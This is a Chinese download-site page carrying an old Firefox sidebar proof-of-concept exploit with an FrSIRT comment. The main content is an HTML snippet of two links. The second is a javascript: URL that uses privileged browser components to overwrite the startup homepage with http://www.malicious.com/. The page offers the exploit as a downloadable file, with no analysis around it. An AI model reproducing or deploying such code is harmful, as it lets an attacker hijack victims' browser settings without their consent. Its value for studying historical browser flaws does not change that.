⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 mozilla firefox sidebar code execution proof of concept exploit.txt

📁 一些可以实现益出的程序
💻 TXT
字号:
// FrSIRT Comment : If a user clicks on a link, this code will load "about:plugins"
// into Firefox sidebar panel and will overwrite "browser.startup.homepage", 
// which will change the homepage to malicious.com

<a href="about:plugins" target="_search">Click Here First</a><br>
<a href="javascript: var prefs = Components.classes['@mozilla.org/preferences-service;1']
.getService(Components.interfaces.nsIPrefBranch); prefs.setCharPref('browser.startup.homepage',
'http://www.malicious.com/');" target="_search">Next, Click Here</a></p>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -